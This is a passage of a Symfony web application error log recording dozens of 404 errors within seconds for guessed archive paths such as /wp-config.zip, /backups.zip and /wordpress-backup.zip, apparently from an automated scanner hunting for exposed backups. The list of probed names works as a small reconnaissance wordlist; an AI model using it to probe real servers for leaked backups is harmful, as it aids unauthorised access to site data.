  8439. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /secure.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /secure.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8440. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-admin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-admin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8441. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservices.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservices.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8442. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8443. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sites.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sites.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8444. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /release-candidate.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /release-candidate.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8445. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /composer.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /composer.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8446. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /plesk.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /plesk.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8447. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /yml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /yml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8448. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /audio.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /audio.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8449. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /domain.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /domain.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8450. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrators.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrators.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8451. [2025-12-20 21:33:42] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /temporary.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /temporary.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8452. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administration.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administration.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8453. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8454. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /applications.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /applications.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8455. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /lib.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /lib.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8456. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8457. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /archive.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /archive.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8458. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /hostgator.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /hostgator.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8459. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ftp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ftp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8460. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8461. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /back_up.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /back_up.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8462. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /rpc.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /rpc.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8463. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /test.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /test.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8464. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backups.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backups.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8465. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_weekly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_weekly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8466. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqllite.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqllite.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8467. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-config.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-config.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8468. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8469. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /images.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /images.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8470. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-site.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-site.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8471. [2025-12-20 21:33:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /output.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /output.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8472. [2025-12-20 21:33:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8473. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /directadmin.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /directadmin.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8474. [2025-12-20 21:33:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgres.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgres.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8475. [2025-12-20 21:33:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-20240527.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-20240527.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8476. [2025-12-20 21:33:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bazaar.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bazaar.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8477. [2025-12-20 21:33:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /protected.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /protected.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8478. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /duplicate.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /duplicate.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8479. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /services.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /services.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8480. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbase.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbase.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8481. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /linode.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /linode.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
